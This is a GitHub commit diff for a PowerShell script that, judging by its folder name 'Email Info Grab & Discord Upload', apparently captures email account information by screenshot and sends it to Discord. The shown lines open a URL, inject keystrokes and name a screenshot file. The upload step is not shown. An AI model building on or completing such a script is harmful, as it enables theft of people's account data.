Skip to content

Commit 2c76b9c

Browse files
authored
Update Get-EmailInfo.ps1
1 parent 3ec7907 commit 2c76b9c

File tree

1 file changed

+2
-3
lines changed

1 file changed

+2
-3
lines changed

Email Info Grab & Discord Upload/Get-EmailInfo.ps1

Lines changed: 2 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -5,9 +5,8 @@ function Get-EmailInfo {
55

66
Start-Process $targetURL
77

8-
Start-Sleep -Seconds 3
9-
10-
# Press the down arrow 3 times
8+
Start-Sleep -Seconds 4
9+
1110
[System.Windows.Forms.SendKeys]::SendWait("{DOWN 8}")
1211

1312
$fileName = "CaliShot.png"

0 commit comments

Comments
 (0)